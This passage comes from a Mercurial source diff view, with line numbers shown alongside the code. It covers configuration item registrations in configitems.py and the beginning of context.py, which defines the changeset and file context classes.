1230 default='-',
1231 )
1232 coreconfigitem('web', 'address',
1233 default='',
1234 )
1235 coreconfigitem('web', 'allow-archive',
1236 alias=[('web', 'allow_archive')],
1237 default=list,
1238 )
1239 coreconfigitem('web', 'allow_read',
1240 default=list,
1241 )
1242 coreconfigitem('web', 'baseurl',
1243 default=None,
1244 )
1245 coreconfigitem('web', 'cacerts',
1246 default=None,
1247 )
1248 coreconfigitem('web', 'certificate',
1249 default=None,
1250 )
1251 coreconfigitem('web', 'collapse',
1252 default=False,
1253 )
1254 coreconfigitem('web', 'csp',
1255 default=None,
1256 )
1257 coreconfigitem('web', 'deny_read',
1258 default=list,
1259 )
1260 coreconfigitem('web', 'descend',
1261 default=True,
1262 )
1263 coreconfigitem('web', 'description',
1264 default="",
1265 )
1266 coreconfigitem('web', 'encoding',
1267 default=lambda: encoding.encoding,
1268 )
1269 coreconfigitem('web', 'errorlog',
1270 default='-',
1271 )
1272 coreconfigitem('web', 'ipv6',
1273 default=False,
1274 )
1275 coreconfigitem('web', 'maxchanges',
1276 default=10,
1277 )
1278 coreconfigitem('web', 'maxfiles',
1279 default=10,
1280 )
1281 coreconfigitem('web', 'maxshortchanges',
1282 default=60,
1283 )
1284 coreconfigitem('web', 'motd',
1285 default='',
1286 )
1287 coreconfigitem('web', 'name',
1288 default=dynamicdefault,
1289 )
1290 coreconfigitem('web', 'port',
1291 default=8000,
1292 )
1293 coreconfigitem('web', 'prefix',
1294 default='',
1295 )
1296 coreconfigitem('web', 'push_ssl',
1297 default=True,
1298 )
1299 coreconfigitem('web', 'refreshinterval',
1300 default=20,
1301 )
1302 coreconfigitem('web', 'server-header',
1303 default=None,
1304 )
1305 coreconfigitem('web', 'staticurl',
1306 default=None,
1307 )
1308 coreconfigitem('web', 'stripes',
1309 default=1,
1310 )
1311 coreconfigitem('web', 'style',
1312 default='paper',
1313 )
1314 coreconfigitem('web', 'templates',
1315 default=None,
1316 )
1317 coreconfigitem('web', 'view',
1318 default='served',
1319 )
1320 coreconfigitem('worker', 'backgroundclose',
1321 default=dynamicdefault,
1322 )
1323 # Windows defaults to a limit of 512 open files. A buffer of 128
1324 # should give us enough headway.
1325 coreconfigitem('worker', 'backgroundclosemaxqueue',
1326 default=384,
1327 )
1325 coreconfigitem('worker', 'backgroundcloseminfilecount',
1328 coreconfigitem('worker', 'backgroundcloseminfilecount',
1326 default=2048,
1329 default=2048,
1327 )
1330 )
1328 coreconfigitem('worker', 'backgroundclosethreadcount',
1331 coreconfigitem('worker', 'backgroundclosethreadcount',
1329 default=4,
1332 default=4,
1330 )
1333 )
1331 coreconfigitem('worker', 'enabled',
1334 coreconfigitem('worker', 'enabled',
1332 default=True,
1335 default=True,
1333 )
1336 )
1334 coreconfigitem('worker', 'numcpus',
1337 coreconfigitem('worker', 'numcpus',
1335 default=None,
1338 default=None,
1336 )
1339 )
1337
1340
# Rebase-related configuration moved to core because other extensions are
# doing strange things. For example, shelve imports the rebase extension to
# reuse some bits without formally loading it.
coreconfigitem('commands', 'rebase.requiredest',
    default=False,
)
coreconfigitem('experimental', 'rebaseskipobsolete',
    default=True,
)
coreconfigitem('rebase', 'singletransaction',
    default=False,
)
coreconfigitem('rebase', 'experimental.inmemory',
    default=False,
)
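
# Editor's note -- a minimal usage sketch, not part of the original file:
# once an item is registered via coreconfigitem(), readers obtain its value
# through the ui config accessors, which fall back to the registered default
# when the user's configuration does not set the item (assuming a `ui`
# instance is in scope):
#
#     port = ui.configint('web', 'port')        # -> 8000 unless overridden
#     archives = ui.configlist('web', 'allow-archive')
#     inmem = ui.configbool('rebase', 'experimental.inmemory')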
@@ -1,2534 +1,2536 b''
# context.py - changeset and file context objects for mercurial
#
# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import errno
import filecmp
import os
import stat

from .i18n import _
from .node import (
    addednodeid,
    bin,
    hex,
    modifiednodeid,
    nullid,
    nullrev,
    short,
    wdirfilenodeids,
    wdirid,
)
from . import (
    dagop,
    encoding,
    error,
    fileset,
    match as matchmod,
    obsolete as obsmod,
    patch,
    pathutil,
    phases,
    pycompat,
    repoview,
    revlog,
    scmutil,
    sparse,
    subrepo,
    subrepoutil,
    util,
)
from .utils import (
    dateutil,
    stringutil,
)

propertycache = util.propertycache

class basectx(object):
    """A basectx object represents the common logic for its children:
    changectx: read-only context that is already present in the repo,
    workingctx: a context that represents the working directory and can
                be committed,
    memctx: a context that represents changes in-memory and can also
            be committed."""

    def __init__(self, repo):
        self._repo = repo

    def __bytes__(self):
        return short(self.node())

    __str__ = encoding.strmethod(__bytes__)

    def __repr__(self):
        return r"<%s %s>" % (type(self).__name__, str(self))

    def __eq__(self, other):
        try:
            return type(self) == type(other) and self._rev == other._rev
        except AttributeError:
            return False

    def __ne__(self, other):
        return not (self == other)

    def __contains__(self, key):
        return key in self._manifest

    def __getitem__(self, key):
        return self.filectx(key)

    def __iter__(self):
        return iter(self._manifest)

    def _buildstatusmanifest(self, status):
        """Builds a manifest that includes the given status results, if this is
        a working copy context. For non-working copy contexts, it just returns
        the normal manifest."""
        return self.manifest()

    def _matchstatus(self, other, match):
        """This internal method provides a way for child objects to override
        the match operator.
        """
        return match

    def _buildstatus(self, other, s, match, listignored, listclean,
                     listunknown):
        """build a status with respect to another context"""
        # Load earliest manifest first for caching reasons. More specifically,
        # if you have revisions 1000 and 1001, 1001 is probably stored as a
        # delta against 1000. Thus, if you read 1000 first, we'll reconstruct
        # 1000 and cache it so that when you read 1001, we just need to apply a
        # delta to what's in the cache. So that's one full reconstruction + one
        # delta application.
        mf2 = None
        if self.rev() is not None and self.rev() < other.rev():
            mf2 = self._buildstatusmanifest(s)
        mf1 = other._buildstatusmanifest(s)
        if mf2 is None:
            mf2 = self._buildstatusmanifest(s)

        modified, added = [], []
        removed = []
        clean = []
        deleted, unknown, ignored = s.deleted, s.unknown, s.ignored
        deletedset = set(deleted)
        d = mf1.diff(mf2, match=match, clean=listclean)
        for fn, value in d.iteritems():
            if fn in deletedset:
                continue
            if value is None:
                clean.append(fn)
                continue
            (node1, flag1), (node2, flag2) = value
            if node1 is None:
                added.append(fn)
            elif node2 is None:
                removed.append(fn)
            elif flag1 != flag2:
                modified.append(fn)
            elif node2 not in wdirfilenodeids:
                # When comparing files between two commits, we save time by
                # not comparing the file contents when the nodeids differ.
                # Note that this means we incorrectly report a reverted change
                # to a file as a modification.
                modified.append(fn)
            elif self[fn].cmp(other[fn]):
                modified.append(fn)
            else:
                clean.append(fn)

        if removed:
            # need to filter files if they are already reported as removed
            unknown = [fn for fn in unknown if fn not in mf1 and
                       (not match or match(fn))]
            ignored = [fn for fn in ignored if fn not in mf1 and
                       (not match or match(fn))]
            # if they're deleted, don't report them as removed
            removed = [fn for fn in removed if fn not in deletedset]

        return scmutil.status(modified, added, removed, deleted, unknown,
                              ignored, clean)

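    # Editor's note -- an illustration (hypothetical values) of the diff
    # consumed by _buildstatus() above. mf1.diff(mf2, clean=True) maps each
    # changed path to ((node1, flag1), (node2, flag2)), with None marking
    # absence on one side, or to None itself for clean files:
    #
    #     {'a.txt': ((None, ''), (n2, '')),     # added
    #      'b.txt': ((n1, ''), (None, '')),     # removed
    #      'c.sh':  ((n1, ''), (n1, 'x')),      # flag flip -> modified
    #      'd.txt': None}                       # clean (only when clean=True)
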
    @propertycache
    def substate(self):
        return subrepoutil.state(self, self._repo.ui)

    def subrev(self, subpath):
        return self.substate[subpath][1]

    def rev(self):
        return self._rev
    def node(self):
        return self._node
    def hex(self):
        return hex(self.node())
    def manifest(self):
        return self._manifest
    def manifestctx(self):
        return self._manifestctx
    def repo(self):
        return self._repo
    def phasestr(self):
        return phases.phasenames[self.phase()]
    def mutable(self):
        return self.phase() > phases.public

    def getfileset(self, expr):
        return fileset.getfileset(self, expr)

    def obsolete(self):
        """True if the changeset is obsolete"""
        return self.rev() in obsmod.getrevs(self._repo, 'obsolete')

    def extinct(self):
        """True if the changeset is extinct"""
        return self.rev() in obsmod.getrevs(self._repo, 'extinct')

    def orphan(self):
        """True if the changeset is not obsolete, but its ancestors are"""
        return self.rev() in obsmod.getrevs(self._repo, 'orphan')

    def phasedivergent(self):
        """True if the changeset tries to be a successor of a public changeset

        Only non-public and non-obsolete changesets may be bumped.
        """
        return self.rev() in obsmod.getrevs(self._repo, 'phasedivergent')

    def contentdivergent(self):
        """Is a successor of a changeset with multiple possible successor sets

        Only non-public and non-obsolete changesets may be divergent.
        """
        return self.rev() in obsmod.getrevs(self._repo, 'contentdivergent')

    def isunstable(self):
        """True if the changeset is either unstable, bumped or divergent"""
        return self.orphan() or self.phasedivergent() or self.contentdivergent()

    def instabilities(self):
        """return the list of instabilities affecting this changeset.

        Instabilities are returned as strings. Possible values are:
        - orphan,
        - phase-divergent,
        - content-divergent.
        """
        instabilities = []
        if self.orphan():
            instabilities.append('orphan')
        if self.phasedivergent():
            instabilities.append('phase-divergent')
        if self.contentdivergent():
            instabilities.append('content-divergent')
        return instabilities

    def parents(self):
        """return contexts for each parent changeset"""
        return self._parents

    def p1(self):
        return self._parents[0]

    def p2(self):
        parents = self._parents
        if len(parents) == 2:
            return parents[1]
        return changectx(self._repo, nullrev)

    def _fileinfo(self, path):
        if r'_manifest' in self.__dict__:
            try:
                return self._manifest[path], self._manifest.flags(path)
            except KeyError:
                raise error.ManifestLookupError(self._node, path,
                                                _('not found in manifest'))
        if r'_manifestdelta' in self.__dict__ or path in self.files():
            if path in self._manifestdelta:
                return (self._manifestdelta[path],
                        self._manifestdelta.flags(path))
        mfl = self._repo.manifestlog
        try:
            node, flag = mfl[self._changeset.manifest].find(path)
        except KeyError:
            raise error.ManifestLookupError(self._node, path,
                                            _('not found in manifest'))

        return node, flag

    def filenode(self, path):
        return self._fileinfo(path)[0]

    def flags(self, path):
        try:
            return self._fileinfo(path)[1]
        except error.LookupError:
            return ''

    def sub(self, path, allowcreate=True):
        '''return a subrepo for the stored revision of path, never wdir()'''
        return subrepo.subrepo(self, path, allowcreate=allowcreate)

    def nullsub(self, path, pctx):
        return subrepo.nullsubrepo(self, path, pctx)

    def workingsub(self, path):
        '''return a subrepo for the stored revision, or wdir if this is a wdir
        context.
        '''
        return subrepo.subrepo(self, path, allowwdir=True)

    def match(self, pats=None, include=None, exclude=None, default='glob',
              listsubrepos=False, badfn=None):
        r = self._repo
        return matchmod.match(r.root, r.getcwd(), pats,
                              include, exclude, default,
                              auditor=r.nofsauditor, ctx=self,
                              listsubrepos=listsubrepos, badfn=badfn)

    def diff(self, ctx2=None, match=None, **opts):
        """Returns a diff generator for the given contexts and matcher"""
        if ctx2 is None:
            ctx2 = self.p1()
        if ctx2 is not None:
            ctx2 = self._repo[ctx2]
        diffopts = patch.diffopts(self._repo.ui, pycompat.byteskwargs(opts))
        return patch.diff(self._repo, ctx2, self, match=match, opts=diffopts)

    def dirs(self):
        return self._manifest.dirs()

    def hasdir(self, dir):
        return self._manifest.hasdir(dir)

    def status(self, other=None, match=None, listignored=False,
               listclean=False, listunknown=False, listsubrepos=False):
        """return status of files between two nodes or node and working
        directory.

        If other is None, compare this node with working directory.

        returns (modified, added, removed, deleted, unknown, ignored, clean)
        """

        ctx1 = self
        ctx2 = self._repo[other]

        # This next code block is, admittedly, fragile logic that tests for
        # reversing the contexts and wouldn't need to exist if it weren't for
        # the fast (and common) code path of comparing the working directory
        # with its first parent.
        #
        # What we're aiming for here is the ability to call:
        #
        # workingctx.status(parentctx)
        #
        # If we always built the manifest for each context and compared those,
        # then we'd be done. But the special case of the above call means we
        # just copy the manifest of the parent.
        reversed = False
        if (not isinstance(ctx1, changectx)
            and isinstance(ctx2, changectx)):
            reversed = True
            ctx1, ctx2 = ctx2, ctx1

        match = match or matchmod.always(self._repo.root, self._repo.getcwd())
        match = ctx2._matchstatus(ctx1, match)
        r = scmutil.status([], [], [], [], [], [], [])
        r = ctx2._buildstatus(ctx1, r, match, listignored, listclean,
                              listunknown)

        if reversed:
            # Reverse added and removed. Clear deleted, unknown and ignored as
            # these make no sense to reverse.
            r = scmutil.status(r.modified, r.removed, r.added, [], [], [],
                               r.clean)

        if listsubrepos:
            for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
                try:
                    rev2 = ctx2.subrev(subpath)
                except KeyError:
                    # A subrepo that existed in node1 was deleted between
                    # node1 and node2 (inclusive). Thus, ctx2's substate
                    # won't contain that subpath. The best we can do is
                    # ignore it.
                    rev2 = None
                submatch = matchmod.subdirmatcher(subpath, match)
                s = sub.status(rev2, match=submatch, ignored=listignored,
                               clean=listclean, unknown=listunknown,
                               listsubrepos=True)
                for rfiles, sfiles in zip(r, s):
                    rfiles.extend("%s/%s" % (subpath, f) for f in sfiles)

        for l in r:
            l.sort()

        return r

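    # Editor's sketch -- hypothetical usage, not from the original file:
    #
    #     st = repo[None].status(repo['.'], listclean=True)
    #     st.modified, st.added, st.removed   # sorted lists of paths
    #
    # Because a working context is compared against a changectx here, the
    # reversal fast path above swaps the contexts, then swaps the added and
    # removed buckets back before returning.
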
class changectx(basectx):
    """A changecontext object makes access to data related to a particular
    changeset convenient. It represents a read-only context already present in
    the repo."""
    def __init__(self, repo, changeid='.'):
        """changeid is a revision number, node, or tag"""
        super(changectx, self).__init__(repo)

        try:
            if isinstance(changeid, int):
                self._node = repo.changelog.node(changeid)
                self._rev = changeid
                return
            elif changeid == 'null':
                self._node = nullid
                self._rev = nullrev
                return
            elif changeid == 'tip':
                self._node = repo.changelog.tip()
                self._rev = repo.changelog.rev(self._node)
                return
            elif (changeid == '.'
                  or repo.local() and changeid == repo.dirstate.p1()):
                # this is a hack to delay/avoid loading obsmarkers
                # when we know that '.' won't be hidden
                self._node = repo.dirstate.p1()
                self._rev = repo.unfiltered().changelog.rev(self._node)
                return
            elif len(changeid) == 20:
                try:
                    self._node = changeid
                    self._rev = repo.changelog.rev(changeid)
                    return
                except error.FilteredLookupError:
                    raise
                except LookupError:
                    # check if it might have come from damaged dirstate
                    #
                    # XXX we could avoid the unfiltered if we had a recognizable
                    # exception for filtered changeset access
                    if (repo.local()
                        and changeid in repo.unfiltered().dirstate.parents()):
                        msg = _("working directory has unknown parent '%s'!")
                        raise error.Abort(msg % short(changeid))
                    changeid = hex(changeid) # for the error message

            elif len(changeid) == 40:
                try:
                    self._node = bin(changeid)
                    self._rev = repo.changelog.rev(self._node)
                    return
                except error.FilteredLookupError:
                    raise
                except (TypeError, LookupError):
                    pass

            # lookup failed
        except (error.FilteredIndexError, error.FilteredLookupError):
            raise error.FilteredRepoLookupError(_("filtered revision '%s'")
                                                % pycompat.bytestr(changeid))
        except error.FilteredRepoLookupError:
            raise
        except IndexError:
            pass
        raise error.RepoLookupError(
            _("unknown revision '%s'") % changeid)

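    # Editor's note -- the lookup above accepts several changeid forms; a few
    # hedged examples, assuming `repo` is a local repository:
    #
    #     repo[0]              # revision number
    #     repo['null']         # the null revision
    #     repo['tip']          # repository tip
    #     repo['.']            # working directory parent
    #     repo[somenode]       # a 20-byte binary node
    #     repo['d2ae7f53...']  # a 40-char hex node (truncated here)
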
    def __hash__(self):
        try:
            return hash(self._rev)
        except AttributeError:
            return id(self)

    def __nonzero__(self):
        return self._rev != nullrev

    __bool__ = __nonzero__

    @propertycache
    def _changeset(self):
        return self._repo.changelog.changelogrevision(self.rev())

    @propertycache
    def _manifest(self):
        return self._manifestctx.read()

    @property
    def _manifestctx(self):
        return self._repo.manifestlog[self._changeset.manifest]

    @propertycache
    def _manifestdelta(self):
        return self._manifestctx.readdelta()

    @propertycache
    def _parents(self):
        repo = self._repo
        p1, p2 = repo.changelog.parentrevs(self._rev)
        if p2 == nullrev:
            return [changectx(repo, p1)]
        return [changectx(repo, p1), changectx(repo, p2)]

    def changeset(self):
        c = self._changeset
        return (
            c.manifest,
            c.user,
            c.date,
            c.files,
            c.description,
            c.extra,
        )
    def manifestnode(self):
        return self._changeset.manifest

    def user(self):
        return self._changeset.user
    def date(self):
        return self._changeset.date
    def files(self):
        return self._changeset.files
    def description(self):
        return self._changeset.description
    def branch(self):
        return encoding.tolocal(self._changeset.extra.get("branch"))
    def closesbranch(self):
        return 'close' in self._changeset.extra
    def extra(self):
        """Return a dict of extra information."""
        return self._changeset.extra
    def tags(self):
        """Return a list of byte tag names"""
        return self._repo.nodetags(self._node)
    def bookmarks(self):
        """Return a list of byte bookmark names."""
        return self._repo.nodebookmarks(self._node)
    def phase(self):
        return self._repo._phasecache.phase(self._repo, self._rev)
    def hidden(self):
        return self._rev in repoview.filterrevs(self._repo, 'visible')

    def isinmemory(self):
        return False

    def children(self):
        """return list of changectx contexts for each child changeset.

        This returns only the immediate child changesets. Use descendants() to
        recursively walk children.
        """
        c = self._repo.changelog.children(self._node)
        return [changectx(self._repo, x) for x in c]

    def ancestors(self):
        for a in self._repo.changelog.ancestors([self._rev]):
            yield changectx(self._repo, a)

    def descendants(self):
        """Recursively yield all children of the changeset.

        For just the immediate children, use children()
        """
        for d in self._repo.changelog.descendants([self._rev]):
            yield changectx(self._repo, d)

    def filectx(self, path, fileid=None, filelog=None):
        """get a file context from this changeset"""
        if fileid is None:
            fileid = self.filenode(path)
        return filectx(self._repo, path, fileid=fileid,
                       changectx=self, filelog=filelog)

    def ancestor(self, c2, warn=False):
        """return the "best" ancestor context of self and c2

        If there are multiple candidates, it will show a message and check
        merge.preferancestor configuration before falling back to the
        revlog ancestor."""
        # deal with workingctxs
        n2 = c2._node
        if n2 is None:
            n2 = c2._parents[0]._node
        cahs = self._repo.changelog.commonancestorsheads(self._node, n2)
        if not cahs:
            anc = nullid
        elif len(cahs) == 1:
            anc = cahs[0]
        else:
            # experimental config: merge.preferancestor
            for r in self._repo.ui.configlist('merge', 'preferancestor'):
                try:
                    ctx = scmutil.revsymbol(self._repo, r)
                except error.RepoLookupError:
                    continue
                anc = ctx.node()
                if anc in cahs:
                    break
            else:
                anc = self._repo.changelog.ancestor(self._node, n2)
            if warn:
                self._repo.ui.status(
                    (_("note: using %s as ancestor of %s and %s\n") %
                     (short(anc), short(self._node), short(n2))) +
                    ''.join(_(" alternatively, use --config "
                              "merge.preferancestor=%s\n") %
                            short(n) for n in sorted(cahs) if n != anc))
        return changectx(self._repo, anc)

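    # Editor's note -- an illustrative (hypothetical) criss-cross case for
    # ancestor() above: commonancestorsheads() may return several heads,
    #
    #     cahs = repo.changelog.commonancestorsheads(n1, n2)   # e.g. [a, b]
    #
    # in which case the first merge.preferancestor entry resolving to one of
    # them wins; otherwise the plain revlog ancestor is used and, with
    # warn=True, the alternatives are printed.
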
    def descendant(self, other):
        """True if other is a descendant of this changeset"""
        return self._repo.changelog.descendant(self._rev, other._rev)

    def walk(self, match):
        '''Generates matching file names.'''

        # Wrap match.bad method to have message with nodeid
        def bad(fn, msg):
            # The manifest doesn't know about subrepos, so don't complain about
            # paths into valid subrepos.
            if any(fn == s or fn.startswith(s + '/')
                   for s in self.substate):
                return
            match.bad(fn, _('no such file in rev %s') % self)

        m = matchmod.badmatch(match, bad)
        return self._manifest.walk(m)

    def matches(self, match):
        return self.walk(match)

class basefilectx(object):
    """A filecontext object represents the common logic for its children:
    filectx: read-only access to a filerevision that is already present
             in the repo,
    workingfilectx: a filecontext that represents files from the working
                    directory,
    memfilectx: a filecontext that represents files in-memory,
    overlayfilectx: duplicate another filecontext with some fields overridden.
    """
    @propertycache
    def _filelog(self):
        return self._repo.file(self._path)

    @propertycache
    def _changeid(self):
        if r'_changeid' in self.__dict__:
            return self._changeid
        elif r'_changectx' in self.__dict__:
            return self._changectx.rev()
        elif r'_descendantrev' in self.__dict__:
            # this file context was created from a revision with a known
            # descendant, we can (lazily) correct for linkrev aliases
            return self._adjustlinkrev(self._descendantrev)
        else:
            return self._filelog.linkrev(self._filerev)

    @propertycache
    def _filenode(self):
        if r'_fileid' in self.__dict__:
            return self._filelog.lookup(self._fileid)
        else:
            return self._changectx.filenode(self._path)

    @propertycache
    def _filerev(self):
        return self._filelog.rev(self._filenode)

    @propertycache
    def _repopath(self):
        return self._path

    def __nonzero__(self):
        try:
            self._filenode
            return True
        except error.LookupError:
            # file is missing
            return False

    __bool__ = __nonzero__

    def __bytes__(self):
        try:
            return "%s@%s" % (self.path(), self._changectx)
        except error.LookupError:
            return "%s@???" % self.path()

    __str__ = encoding.strmethod(__bytes__)

    def __repr__(self):
        return r"<%s %s>" % (type(self).__name__, str(self))

    def __hash__(self):
        try:
            return hash((self._path, self._filenode))
        except AttributeError:
            return id(self)

    def __eq__(self, other):
        try:
            return (type(self) == type(other) and self._path == other._path
                    and self._filenode == other._filenode)
        except AttributeError:
            return False

    def __ne__(self, other):
        return not (self == other)

    def filerev(self):
        return self._filerev
    def filenode(self):
        return self._filenode
    @propertycache
    def _flags(self):
        return self._changectx.flags(self._path)
    def flags(self):
        return self._flags
    def filelog(self):
        return self._filelog
    def rev(self):
        return self._changeid
    def linkrev(self):
        return self._filelog.linkrev(self._filerev)
    def node(self):
        return self._changectx.node()
    def hex(self):
        return self._changectx.hex()
    def user(self):
        return self._changectx.user()
    def date(self):
        return self._changectx.date()
    def files(self):
        return self._changectx.files()
    def description(self):
        return self._changectx.description()
    def branch(self):
        return self._changectx.branch()
    def extra(self):
        return self._changectx.extra()
    def phase(self):
        return self._changectx.phase()
    def phasestr(self):
        return self._changectx.phasestr()
    def obsolete(self):
        return self._changectx.obsolete()
    def instabilities(self):
        return self._changectx.instabilities()
    def manifest(self):
        return self._changectx.manifest()
    def changectx(self):
        return self._changectx
    def renamed(self):
        return self._copied
    def repo(self):
        return self._repo
    def size(self):
        return len(self.data())

    def path(self):
        return self._path

    def isbinary(self):
        try:
            return stringutil.binary(self.data())
        except IOError:
            return False
    def isexec(self):
        return 'x' in self.flags()
    def islink(self):
        return 'l' in self.flags()

    def isabsent(self):
        """whether this filectx represents a file not in self._changectx

        This is mainly for merge code to detect change/delete conflicts. This
        is expected to be True for all subclasses of basectx."""
        return False

    _customcmp = False
    def cmp(self, fctx):
        """compare with other file context

        returns True if different than fctx.
        """
        if fctx._customcmp:
            return fctx.cmp(self)

        if (fctx._filenode is None
                and (self._repo._encodefilterpats
                     # if file data starts with '\1\n', empty metadata block is
                     # prepended, which adds 4 bytes to filelog.size().
                     or self.size() - 4 == fctx.size())
                or self.size() == fctx.size()):
            return self._filelog.cmp(self._filenode, fctx.data())

        return True

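    # Editor's note on the size fast path in cmp() above: when neither size
    # condition holds, the sizes are known to differ (and neither encode
    # filters nor a prepended metadata block can mask that), so the contents
    # must differ and cmp() returns True without reading any file data.
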
    def _adjustlinkrev(self, srcrev, inclusive=False):
        """return the first ancestor of <srcrev> introducing <fnode>

        If the linkrev of the file revision does not point to an ancestor of
        srcrev, we'll walk down the ancestors until we find one introducing
        this file revision.

        :srcrev: the changeset revision we search ancestors from
        :inclusive: if true, the src revision will also be checked
        """
        repo = self._repo
        cl = repo.unfiltered().changelog
        mfl = repo.manifestlog
        # fetch the linkrev
        lkr = self.linkrev()
        # hack to reuse ancestor computation when searching for renames
        memberanc = getattr(self, '_ancestrycontext', None)
        iteranc = None
        if srcrev is None:
            # wctx case, used by workingfilectx during mergecopy
            revs = [p.rev() for p in self._repo[None].parents()]
            inclusive = True # we skipped the real (revless) source
        else:
            revs = [srcrev]
        if memberanc is None:
            memberanc = iteranc = cl.ancestors(revs, lkr,
                                               inclusive=inclusive)
        # check if this linkrev is an ancestor of srcrev
        if lkr not in memberanc:
            if iteranc is None:
                iteranc = cl.ancestors(revs, lkr, inclusive=inclusive)
            fnode = self._filenode
            path = self._path
            for a in iteranc:
                ac = cl.read(a) # get changeset data (we avoid object creation)
                if path in ac[3]: # checking the 'files' field.
                    # The file has been touched, check if the content is
                    # similar to the one we search for.
                    if fnode == mfl[ac[0]].readfast().get(path):
                        return a
            # In theory, we should never get out of that loop without a result.
            # But if the manifest uses a buggy file revision (not a child of
            # the one it replaces), we could. Such a buggy situation will
            # likely result in a crash somewhere else at some point.
        return lkr

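    # Editor's sketch of the linkrev-shadowing case handled above
    # (hypothetical history): when two changesets introduce identical content
    # for a path, the filelog stores a single file revision whose linkrev
    # points at the earlier changeset. Reading the file from a branch that
    # contains only the later changeset must not report the earlier one, so
    # _adjustlinkrev() walks the ancestors of srcrev looking for the first
    # changeset whose manifest maps the path to this filenode.
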
819 def introrev(self):
819 def introrev(self):
820 """return the rev of the changeset which introduced this file revision
820 """return the rev of the changeset which introduced this file revision
821
821
822 This method is different from linkrev because it take into account the
822 This method is different from linkrev because it take into account the
823 changeset the filectx was created from. It ensures the returned
823 changeset the filectx was created from. It ensures the returned
824 revision is one of its ancestors. This prevents bugs from
824 revision is one of its ancestors. This prevents bugs from
825 'linkrev-shadowing' when a file revision is used by multiple
825 'linkrev-shadowing' when a file revision is used by multiple
826 changesets.
826 changesets.
827 """
827 """
828 lkr = self.linkrev()
828 lkr = self.linkrev()
829 attrs = vars(self)
829 attrs = vars(self)
830 noctx = not (r'_changeid' in attrs or r'_changectx' in attrs)
830 noctx = not (r'_changeid' in attrs or r'_changectx' in attrs)
831 if noctx or self.rev() == lkr:
831 if noctx or self.rev() == lkr:
832 return self.linkrev()
832 return self.linkrev()
833 return self._adjustlinkrev(self.rev(), inclusive=True)
833 return self._adjustlinkrev(self.rev(), inclusive=True)
834
834
835 def introfilectx(self):
835 def introfilectx(self):
836 """Return filectx having identical contents, but pointing to the
836 """Return filectx having identical contents, but pointing to the
837 changeset revision where this filectx was introduced"""
837 changeset revision where this filectx was introduced"""
838 introrev = self.introrev()
838 introrev = self.introrev()
839 if self.rev() == introrev:
839 if self.rev() == introrev:
840 return self
840 return self
841 return self.filectx(self.filenode(), changeid=introrev)
841 return self.filectx(self.filenode(), changeid=introrev)
842
842
843 def _parentfilectx(self, path, fileid, filelog):
843 def _parentfilectx(self, path, fileid, filelog):
844 """create parent filectx keeping ancestry info for _adjustlinkrev()"""
844 """create parent filectx keeping ancestry info for _adjustlinkrev()"""
845 fctx = filectx(self._repo, path, fileid=fileid, filelog=filelog)
845 fctx = filectx(self._repo, path, fileid=fileid, filelog=filelog)
846 if r'_changeid' in vars(self) or r'_changectx' in vars(self):
846 if r'_changeid' in vars(self) or r'_changectx' in vars(self):
847 # If self is associated with a changeset (probably explicitly
847 # If self is associated with a changeset (probably explicitly
848 # fed), ensure the created filectx is associated with a
848 # fed), ensure the created filectx is associated with a
849 # changeset that is an ancestor of self.changectx.
849 # changeset that is an ancestor of self.changectx.
850 # This lets us later use _adjustlinkrev to get a correct link.
850 # This lets us later use _adjustlinkrev to get a correct link.
851 fctx._descendantrev = self.rev()
851 fctx._descendantrev = self.rev()
852 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
852 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
853 elif r'_descendantrev' in vars(self):
853 elif r'_descendantrev' in vars(self):
854 # Otherwise propagate _descendantrev if we have one associated.
854 # Otherwise propagate _descendantrev if we have one associated.
855 fctx._descendantrev = self._descendantrev
855 fctx._descendantrev = self._descendantrev
856 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
856 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
857 return fctx
857 return fctx
858
858
859 def parents(self):
859 def parents(self):
860 _path = self._path
860 _path = self._path
861 fl = self._filelog
861 fl = self._filelog
862 parents = self._filelog.parents(self._filenode)
862 parents = self._filelog.parents(self._filenode)
863 pl = [(_path, node, fl) for node in parents if node != nullid]
863 pl = [(_path, node, fl) for node in parents if node != nullid]
864
864
865 r = fl.renamed(self._filenode)
865 r = fl.renamed(self._filenode)
866 if r:
866 if r:
867 # - In the simple rename case, both parents are nullid and pl is empty.
867 # - In the simple rename case, both parents are nullid and pl is empty.
868 # - In case of merge, only one of the parents is nullid and should
868 # - In case of merge, only one of the parents is nullid and should
869 # be replaced with the rename information. This parent is -always-
869 # be replaced with the rename information. This parent is -always-
870 # the first one.
870 # the first one.
871 #
871 #
872 # As nullid has always been filtered out in the previous list
872 # As nullid has always been filtered out in the previous list
873 # comprehension, inserting at 0 will always result in replacing the
873 # comprehension, inserting at 0 will always result in replacing the
874 # first nullid parent with the rename information.
874 # first nullid parent with the rename information.
875 pl.insert(0, (r[0], r[1], self._repo.file(r[0])))
875 pl.insert(0, (r[0], r[1], self._repo.file(r[0])))
876
876
877 return [self._parentfilectx(path, fnode, l) for path, fnode, l in pl]
877 return [self._parentfilectx(path, fnode, l) for path, fnode, l in pl]
878
878
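# An illustrative aside, not part of context.py: how the rename tuple from
# fl.renamed() slots into the parent list built above. `nullid` and the
# plain tuples here are simplified stand-ins for Mercurial's real types:

nullid = b'\0' * 20

def parentlist(p1, p2, renamed=None):
    pl = [n for n in (p1, p2) if n != nullid]  # nullid parents dropped
    if renamed:                                # (srcpath, srcfilenode)
        pl.insert(0, renamed)                  # fills the first nullid slot
    return pl

# simple rename: both parents are nullid, so the rename is the only parent
assert parentlist(nullid, nullid, (b'old', b'x')) == [(b'old', b'x')]
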
879 def p1(self):
879 def p1(self):
880 return self.parents()[0]
880 return self.parents()[0]
881
881
882 def p2(self):
882 def p2(self):
883 p = self.parents()
883 p = self.parents()
884 if len(p) == 2:
884 if len(p) == 2:
885 return p[1]
885 return p[1]
886 return filectx(self._repo, self._path, fileid=-1, filelog=self._filelog)
886 return filectx(self._repo, self._path, fileid=-1, filelog=self._filelog)
887
887
888 def annotate(self, follow=False, skiprevs=None, diffopts=None):
888 def annotate(self, follow=False, skiprevs=None, diffopts=None):
889 """Returns a list of annotateline objects for each line in the file
889 """Returns a list of annotateline objects for each line in the file
890
890
891 - line.fctx is the filectx of the node where that line was last changed
891 - line.fctx is the filectx of the node where that line was last changed
892 - line.lineno is the line number at the first appearance in the managed
892 - line.lineno is the line number at the first appearance in the managed
